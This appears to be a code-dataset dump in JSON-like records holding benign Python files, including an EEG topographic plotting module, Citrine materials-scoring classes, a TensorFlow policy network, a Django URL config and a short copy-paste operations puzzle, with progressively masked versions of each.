self._subaxes:\r\n ax.set_xlim(left, right)\r\n self.figure.canvas.draw()\r\n\r\n @property\r\n def ylim(self):\r\n \"\"\"Return ylim for subplots.\"\"\"\r\n lim = [ax.get_ylim() for ax in self._subaxes]\r\n if lim == []:\r\n lim = None\r\n return lim\r\n\r\n @ylim.setter\r\n def ylim(self, bottom=None, top=None):\r\n \"\"\"Set y-axis limits on all subplots.\"\"\"\r\n for ax in self._subaxes:\r\n ax.set_ylim(bottom, top)\r\n self.figure.canvas.draw()\r\n\r\n @property\r\n def yscale(self):\r\n \"\"\"Return yscale for subplots.\"\"\"\r\n yscales = [ax.get_yscale() for ax in self._subaxes]\r\n return yscales\r\n\r\n @yscale.setter\r\n def yscale(self, value='linear'):\r\n \"\"\"Set y-axis limits on all subplots.\"\"\"\r\n for ax in self._subaxes:\r\n ax.set_yscale(value)\r\n self.figure.canvas.draw()\r\n\r\n def auto_ylim(self, xlim=None, yscale='linear'):\r\n \"\"\"Return an estimate for a good ylim.\r\n\r\n Parameters\r\n ----------\r\n xlim : 2-tuple, optional\r\n Limits in (the index of) the data from where the scaling should be\r\n computed.\r\n yscale : linear or log, optional\r\n Scaling of y-axis.\r\n\r\n \"\"\"\r\n electrodes = [col for col in self.data.columns\r\n if col in ELECTRODES]\r\n if xlim is None:\r\n data = self.data.ix[:, electrodes]\r\n else:\r\n indices = ((self.data.index >= xlim[0]) &\r\n (self.data.index <= xlim[1]))\r\n data = self.data.ix[indices, electrodes]\r\n min_data = data.min().min()\r\n max_data = data.max().max()\r\n abs_max = max(abs(min_data), max_data)\r\n if yscale == 'linear' or yscale == 'symlog':\r\n if min_data >= 0:\r\n ylim = 0, max_data\r\n else:\r\n ylim = -abs_max, abs_max\r\n elif yscale == 'log':\r\n if min_data > 0:\r\n ylim = min_data, max_data\r\n else:\r\n pseudo_zero = abs_max * 10 ** -5\r\n ylim = pseudo_zero, abs_max\r\n else:\r\n raise ValueError('Wrong value to yscale: {}'.format(yscale))\r\n return ylim\r\n\r\n def draw(self, type='plot', title=None, xlim=None, ylim=None,\r\n vmin=None, vmax=None,\r\n axis=False, yscale='linear'):\r\n \"\"\"Draw all components in multiplot including the data.\r\n\r\n Parameters\r\n ----------\r\n title : str, optional\r\n Title to put on the plot\r\n xlim : tuple of floats, optional\r\n X-axis limits used for each individual plots\r\n ylim : tuple of floats, optional\r\n Y-axis limits used for each individual plots\r\n\r\n \"\"\"\r\n self.axes.axis((-1.2, 1.2, -1.2, 1.2))\r\n self.draw_head()\r\n self.draw_inner_head()\r\n self.draw_nose()\r\n self.draw_data(type=type, xlim=xlim, ylim=ylim, vmin=vmin,\r\n vmax=vmax, axis=axis, yscale=yscale)\r\n if title is not None:\r\n self.axes.set_title(title)\r\n self.yscale = yscale\r\n\r\n\r\ndef topoplot(data=None, axes=None, method='linear', number_of_contours=10,\r\n title=None, xlim=None, ylim=None):\r\n \"\"\"Plot topographic map of the scalp in 2-D circular view.\r\n\r\n Draw the colored scalp map based on data in a Pandas Series where\r\n the values are indexed according to electrode name.\r\n\r\n Parameters\r\n ----------\r\n data : pandas.Series or pandas.DataFrame, optional\r\n Series with values and indexed by electrode names.\r\n methods : str, optional\r\n Interpolation method\r\n number_of_contours : int\r\n Number of contours in the colored plot.\r\n xlim : 2-tuple of floats, optional\r\n Limits of x-axis in multiplot\r\n ylim : 2-tuple of floats, optional\r\n Limits of y-axis in multiplot\r\n\r\n References\r\n ----------\r\n https://github.com/compmem/ptsa/blob/master/ptsa/plotting/topo.py\r\n\r\n http://sccn.ucsd.edu/~jung/tutorial/topoplot.htm\r\n\r\n Examples\r\n --------\r\n >>> import matplotlib.pyplot as plt\r\n >>> data = {'O1': 1, 'O2': 2, 'P3': -2, 'P4': -4}\r\n >>> plt.ion()\r\n >>> topo_plot = topoplot(data)\r\n\r\n \"\"\"\r\n if isinstance(data, pd.Series) or isinstance(data, dict) or data is None:\r\n topo_plot = TopoPlot(data=data, axes=axes)\r\n topo_plot.draw(title=title, method=method,\r\n number_of_contours=number_of_contours)\r\n return topo_plot\r\n elif isinstance(data, pd.DataFrame):\r\n multi_plot = MultiPlot(data=data, axes=axes)\r\n multi_plot.draw(title=title, xlim=xlim, ylim=ylim)\r\n return multi_plot\r\n\r\n\r\ndef show():\r\n \"\"\"Show plot.\"\"\"\r\n plt.show()\r\n\r\n\r\ndef main(args):\r\n \"\"\"Handle command-line interface to topographic plot.\"\"\"\r\n xlim = args['--xlim']\r\n if args['--xlim'] is not None:\r\n xlim = [float(lim) for lim in xlim.split(',')]\r\n\r\n if args['<file>'] is None:\r\n topoplot()\r\n else:\r\n filename = args['<file>']\r\n if filename.lower().endswith('.csv'):\r\n from .core import read_csv\r\n\r\n df = read_csv(filename, index_col=0)\r\n if args['--transpose']:\r\n df = df.T\r\n if args['--sample-index'] is None:\r\n if args['--center'] is not None:\r\n df = df.center()\r\n topoplot(df, xlim=xlim)\r\n else:\r\n sample_index = int(args['--sample-index'])\r\n series = df.iloc[sample_index - 1, :]\r\n topoplot(series)\r\n else:\r\n exit('Only csv files handled')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n from docopt import docopt\r\n\r\n main(docopt(__doc__))\r\n",
"step-ids": [
19,
22,
23,
25,
30
]
}
|
[
19,
22,
23,
25,
30
] |
"""Tools for working with Scores."""
from typing import List, Optional
from citrine._serialization import properties
from citrine._serialization.polymorphic_serializable import PolymorphicSerializable
from citrine._serialization.serializable import Serializable
from citrine._session import Session
from citrine.informatics.constraints import Constraint
from citrine.informatics.objectives import Objective
__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']
class Score(PolymorphicSerializable['Score']):
"""[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.
Abstract type that returns the proper type given a serialized dict.
"""
@classmethod
def get_type(cls, data):
"""Return the subtype."""
return {
'MLI': LIScore,
'MEI': EIScore,
'MEV': EVScore
}[data['type']]
class LIScore(Serializable['LIScore'], Score):
"""[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
baselines: list[float]
best-so-far values for the various objectives (there must be one for each objective)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
baselines = properties.List(properties.Float, 'baselines')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MLI')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
baselines: List[float],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.baselines: List[float] = baselines
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<LIScore {!r}>'.format(self.name)
class EIScore(Serializable['EIScore'], Score):
"""
[ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
baselines: list[float]
best-so-far values for the various objectives (there must be one for each objective)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
baselines = properties.List(properties.Float, 'baselines')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MEI')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
baselines: List[float],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.baselines: List[float] = baselines
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<EIScore {!r}>'.format(self.name)
class EVScore(Serializable['EVScore'], Score):
"""
[ALPHA] Evaluates the expected value for given objectives.
Parameters
----------
name: str
the name of the score
description: str
the description of the score
objectives: list[Objective]
objectives (e.g., maximize, minimize, tune, etc.)
constraints: list[Constraint]
constraints limiting the allowed values that material instances can have
"""
name = properties.String('name')
description = properties.String('description')
objectives = properties.List(properties.Object(Objective), 'objectives')
constraints = properties.List(properties.Object(Constraint), 'constraints')
typ = properties.String('type', default='MEV')
def __init__(self,
name: str,
description: str,
objectives: List[Objective],
constraints: Optional[List[Constraint]] = None,
session: Optional[Session] = None):
self.name: str = name
self.description: str = description
self.objectives: List[Objective] = objectives
self.constraints: List[Constraint] = constraints or []
self.session: Optional[Session] = session
def __str__(self):
return '<EVScore {!r}>'.format(self.name)
|
normal
|
{
"blob_id": "a0086a9d27a091776378cd8bde31c59899fc07ac",
"index": 3122,
"step-1": "<mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-2": "<mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n <mask token>\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-3": "<mask token>\n\n\nclass Score(PolymorphicSerializable['Score']):\n <mask token>\n <mask token>\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-4": "<mask token>\nfrom typing import List, Optional\nfrom citrine._serialization import properties\nfrom citrine._serialization.polymorphic_serializable import PolymorphicSerializable\nfrom citrine._serialization.serializable import Serializable\nfrom citrine._session import Session\nfrom citrine.informatics.constraints import Constraint\nfrom citrine.informatics.objectives import Objective\n__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']\n\n\nclass Score(PolymorphicSerializable['Score']):\n \"\"\"[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.\n\n Abstract type that returns the proper type given a serialized dict.\n\n\n \"\"\"\n\n @classmethod\n def get_type(cls, data):\n \"\"\"Return the subtype.\"\"\"\n return {'MLI': LIScore, 'MEI': EIScore, 'MEV': EVScore}[data['type']]\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], baselines: List[float], constraints: Optional[List[\n Constraint]]=None, session: Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self, name: str, description: str, objectives: List[\n Objective], constraints: Optional[List[Constraint]]=None, session:\n Optional[Session]=None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-5": "\"\"\"Tools for working with Scores.\"\"\"\nfrom typing import List, Optional\n\nfrom citrine._serialization import properties\nfrom citrine._serialization.polymorphic_serializable import PolymorphicSerializable\nfrom citrine._serialization.serializable import Serializable\nfrom citrine._session import Session\nfrom citrine.informatics.constraints import Constraint\nfrom citrine.informatics.objectives import Objective\n\n__all__ = ['Score', 'LIScore', 'EIScore', 'EVScore']\n\n\nclass Score(PolymorphicSerializable['Score']):\n \"\"\"[ALPHA] A Citrine Score is used to rank materials according to objectives and constraints.\n\n Abstract type that returns the proper type given a serialized dict.\n\n\n \"\"\"\n\n @classmethod\n def get_type(cls, data):\n \"\"\"Return the subtype.\"\"\"\n return {\n 'MLI': LIScore,\n 'MEI': EIScore,\n 'MEV': EVScore\n }[data['type']]\n\n\nclass LIScore(Serializable['LIScore'], Score):\n \"\"\"[ALPHA] Evaluates the likelihood of scoring better than some baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MLI')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n baselines: List[float],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<LIScore {!r}>'.format(self.name)\n\n\nclass EIScore(Serializable['EIScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected magnitude of improvement beyond baselines for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n baselines: list[float]\n best-so-far values for the various objectives (there must be one for each objective)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n baselines = properties.List(properties.Float, 'baselines')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEI')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n baselines: List[float],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.baselines: List[float] = baselines\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EIScore {!r}>'.format(self.name)\n\n\nclass EVScore(Serializable['EVScore'], Score):\n \"\"\"\n [ALPHA] Evaluates the expected value for given objectives.\n\n Parameters\n ----------\n name: str\n the name of the score\n description: str\n the description of the score\n objectives: list[Objective]\n objectives (e.g., maximize, minimize, tune, etc.)\n constraints: list[Constraint]\n constraints limiting the allowed values that material instances can have\n\n \"\"\"\n\n name = properties.String('name')\n description = properties.String('description')\n objectives = properties.List(properties.Object(Objective), 'objectives')\n constraints = properties.List(properties.Object(Constraint), 'constraints')\n typ = properties.String('type', default='MEV')\n\n def __init__(self,\n name: str,\n description: str,\n objectives: List[Objective],\n constraints: Optional[List[Constraint]] = None,\n session: Optional[Session] = None):\n self.name: str = name\n self.description: str = description\n self.objectives: List[Objective] = objectives\n self.constraints: List[Constraint] = constraints or []\n self.session: Optional[Session] = session\n\n def __str__(self):\n return '<EVScore {!r}>'.format(self.name)\n",
"step-ids": [
12,
14,
16,
20,
21
]
}
|
[
12,
14,
16,
20,
21
] |
import tensorflow as tf
class PolicyFullyConnected:
def __init__(self, observation_space, action_space, batch_size, reuse):
height = observation_space[0]
width = observation_space[1]
self.observations = tf.placeholder(shape=(batch_size, height, width), dtype=tf.float32)
with tf.variable_scope(name_or_scope="model", reuse=reuse):
reshaped_observations = tf.reshape(tensor=tf.to_float(self.observations),
shape=(batch_size, height * width))
self.hidden = tf.layers.dense(inputs=reshaped_observations,
units=256,
activation=tf.nn.relu)
logits = tf.layers.dense(inputs=self.hidden, units=action_space)
self.probs = tf.nn.softmax(logits)
self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]
|
normal
|
{
"blob_id": "ecf09f2c503452fefc427e8dbe151e7bc7ef677e",
"index": 6139,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass PolicyFullyConnected:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass PolicyFullyConnected:\n\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width\n ), dtype=tf.float32)\n with tf.variable_scope(name_or_scope='model', reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.\n observations), shape=(batch_size, height * width))\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256, activation=tf.nn.relu)\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]\n",
"step-4": "import tensorflow as tf\n\n\nclass PolicyFullyConnected:\n\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width\n ), dtype=tf.float32)\n with tf.variable_scope(name_or_scope='model', reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.\n observations), shape=(batch_size, height * width))\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256, activation=tf.nn.relu)\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]\n",
"step-5": "import tensorflow as tf\n\n\nclass PolicyFullyConnected:\n def __init__(self, observation_space, action_space, batch_size, reuse):\n height = observation_space[0]\n width = observation_space[1]\n self.observations = tf.placeholder(shape=(batch_size, height, width), dtype=tf.float32)\n\n with tf.variable_scope(name_or_scope=\"model\", reuse=reuse):\n reshaped_observations = tf.reshape(tensor=tf.to_float(self.observations),\n shape=(batch_size, height * width))\n\n self.hidden = tf.layers.dense(inputs=reshaped_observations,\n units=256,\n activation=tf.nn.relu)\n\n logits = tf.layers.dense(inputs=self.hidden, units=action_space)\n\n self.probs = tf.nn.softmax(logits)\n self.values = tf.layers.dense(inputs=self.hidden, units=1)[:, 0]",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
URL Configuration to test mounting created urls from registries
"""
from django.contrib import admin
from django.urls import include, path
from staticpages.loader import StaticpagesLoader
staticpages_loader = StaticpagesLoader()
urlpatterns = [
path("admin/", admin.site.urls),
# Add base pages urls using the same template
*staticpages_loader.build_urls([
"index",
{
"template_path": "index.html",
"name": "foo",
"extra": "free for use",
},
])
]
# Include another urls map on a sub path
urlpatterns.append(
path("sub/", include("sandbox.staticpages_testapp.sub_urls")),
)
|
normal
|
{
"blob_id": "333914f99face050376e4713ca118f2347e50018",
"index": 989,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
"step-3": "<mask token>\nstaticpages_loader = StaticpagesLoader()\nurlpatterns = [path('admin/', admin.site.urls), *staticpages_loader.\n build_urls(['index', {'template_path': 'index.html', 'name': 'foo',\n 'extra': 'free for use'}])]\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
"step-4": "<mask token>\nfrom django.contrib import admin\nfrom django.urls import include, path\nfrom staticpages.loader import StaticpagesLoader\nstaticpages_loader = StaticpagesLoader()\nurlpatterns = [path('admin/', admin.site.urls), *staticpages_loader.\n build_urls(['index', {'template_path': 'index.html', 'name': 'foo',\n 'extra': 'free for use'}])]\nurlpatterns.append(path('sub/', include(\n 'sandbox.staticpages_testapp.sub_urls')))\n",
"step-5": "\"\"\"\nURL Configuration to test mounting created urls from registries\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import include, path\n\nfrom staticpages.loader import StaticpagesLoader\n\n\nstaticpages_loader = StaticpagesLoader()\n\n\nurlpatterns = [\n path(\"admin/\", admin.site.urls),\n # Add base pages urls using the same template\n *staticpages_loader.build_urls([\n \"index\",\n {\n \"template_path\": \"index.html\",\n \"name\": \"foo\",\n \"extra\": \"free for use\",\n },\n ])\n]\n\n# Include another urls map on a sub path\nurlpatterns.append(\n path(\"sub/\", include(\"sandbox.staticpages_testapp.sub_urls\")),\n)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python3
"""minimum time time to write operations of copy and paste"""
def minOperations(n):
"""
a method that calculates the fewest number of operations needed
to result in exactly n H characters in the file
"""
if n <= 1:
return 0
"""loop for n number of times"""
for i in range(2, n + 1):
if n % i == 0:
return minOperations(int(n / i)) + i
|
normal
|
{
"blob_id": "f14b9373e9bf1ad7fe2216dfefc1571f5380fb27",
"index": 6528,
"step-1": "<mask token>\n",
